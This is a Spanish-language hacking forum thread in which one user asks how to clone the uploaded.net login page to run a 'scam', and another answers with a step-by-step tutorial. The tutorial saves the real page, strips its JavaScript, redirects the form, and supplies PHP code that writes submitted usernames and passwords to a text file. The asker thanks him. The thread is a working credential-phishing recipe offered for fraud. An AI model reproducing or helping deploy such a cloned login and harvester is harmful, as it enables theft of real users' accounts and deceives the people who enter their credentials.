[SOLUCIONADO] Se puede editar el login de uploaded.net?

Iniciado por motorxua, Noviembre 15, 2012, 12:57:30 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Noviembre 15, 2012, 12:57:30 PM Ultima modificación: Febrero 07, 2014, 10:24:49 PM por Expermicid
gente, miren este link de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta :  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

se puede editar el from action para hacer un scam? porque cuando copio el codigo fuente, no me aparece para aditarlo, es como un codigo jquery o no se...espero su ayuda ;)
internet libre, y contenidos aún mas libres.

uhm...

ahi esta tu form que buscas!  ;D No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

gracias, pero ahora tengo que ver como lo pongo en el php jaja, saludos!
internet libre, y contenidos aún mas libres.

Noviembre 15, 2012, 01:47:17 PM #3 Ultima modificación: Noviembre 15, 2012, 01:49:18 PM por motorxua
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
uhm...

ahi esta tu form que buscas!  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Consulta, como edito este codigo para agregarle el form action que te envie al php del scam? y en el dreamweaver como lo incrustaria? porque se me superpone al que ya viene determinado..disculpen la ignorancia pero es que me urge conocer el sistema, saludos!
internet libre, y contenidos aún mas libres.

Noviembre 15, 2012, 04:02:51 PM #4 Ultima modificación: Noviembre 15, 2012, 04:05:58 PM por HckDrk
te haré un mini tutorial...



  • primero guardamos la pagina como.. clic derecho, guardar como (almeno en chrome)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


  • despues lo guardamos con un nombre corto, como index.html, recuerda marcar guardar como pagina web completa, aunque viene por defecto xD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • vamos a la carpeta donde se guardaron todos los archivos, imagenes, .js... y abrimos el archivo guest.js con algún editor... y modificamos el form que te había enseñado! xD

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • Borramos todo! con excepción de "open: function()" y de "close: function()" y guardamos. y probamos que realmente se despliegue y se cierre el menú del login

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • despues, vamos a la carpeta donde esta el index de nuestro scam, y creamos el archivo login.php con nuestro codigo....

Código: php
<?php

if($_POST['id'] && $_POST['pw']){

$fp=fopen("datos.txt","a+");
fputs($fp,"Usuario: ".$_POST['id']." | Password: ".$_POST['pw']);
fclose($fp);

}

echo "Scam ok!";

?>


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

  • probamos nuestro scam que funcione bien... en mi caso, en mi servidor local...




  • Veremos que nos genero un archivo .txt con los datos...





jeje me tarde un poquito a pesar de ser un mini tutorial xD

Saludos!!


sos un genio hermano!!! te pasaste!!!
internet libre, y contenidos aún mas libres.